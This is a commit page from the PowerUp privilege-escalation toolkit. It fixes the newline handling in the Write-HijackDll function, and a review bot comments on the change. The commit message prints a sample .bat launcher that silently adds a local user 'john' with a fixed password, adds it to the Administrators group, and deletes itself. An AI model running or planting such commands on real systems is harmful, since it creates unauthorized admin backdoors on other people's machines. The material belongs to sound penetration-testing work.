author | Jon Cave <jon.cave@mwrinfosecurity.com> | 2016-06-30 10:12:27 +0200 |
---|---|---|
committer | Jon Cave <jon.cave@mwrinfosecurity.com> | 2016-06-30 10:12:27 +0200 |
commit | 9596f682744cf5c8bdcb67b6f2a18f5be94073e9 (patch) | |
tree | 95092d4223a0b82e813d21d4a8c4983ae7c87d77 | |
parent | 81ac124f2211799207711fcd1b5fadb0091510f6 (diff) | |

PowerUp: Remove badly encoded new lines from .bat output

The current implementation results in a .bat like:

    @echo off\n
    start /b net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add\n
    start /b "" cmd /c del "%~f0"&exit /b

With literal "\n" strings at the end of the first two lines.

A new line in a PowerShell string should be "`n". However, an extra new line isn't actually necessary in this case.

-rw-r--r-- | Privesc/PowerUp.ps1 | 4 |
1 files changed, 2 insertions, 2 deletions
diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1 index 0b62245..2466975 100644 --- a/Privesc/PowerUp.ps1 +++ b/Privesc/PowerUp.ps1 @@ -2669,8 +2669,8 @@ function Write-HijackDll { # build the launcher .bat if (Test-Path $TargetBatPath) { Remove-Item -Force $TargetBatPath } - "@echo off\n" | Out-File -Encoding ASCII -Append $TargetBatPath - "start /b $BatCommand\n" | Out-File -Encoding ASCII -Append $TargetBatPath + "@echo off" | Out-File -Encoding ASCII -Append $TargetBatPath + "start /b $BatCommand" | Out-File -Encoding ASCII -Append $TargetBatPath 'start /b "" cmd /c del "%~f0"&exit /b' | Out-File -Encoding ASCII -Append $TargetBatPath Write-Verbose ".bat launcher written to: $TargetBatPath" |
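
Review bot: The three consecutive `... | Out-File -Encoding ASCII -Append $TargetBatPath` lines in `Write-HijackDll` would be simpler as one write: pipe an array of the three strings to a single `Out-File -Encoding ASCII $TargetBatPath`, which emits one line per element and removes the need for `-Append` on each line. Dropping the trailing `\n` is correct, since `Out-File` terminates each piped string with a line ending itself and `\n` is not an escape sequence in a PowerShell string. The `start /b $BatCommand` line also deserves a short comment noting that `-Encoding ASCII` replaces any non-ASCII character in `$BatCommand` with `?`, and that the value is expanded into the file verbatim, so what lands in the .bat may differ from what the caller passed.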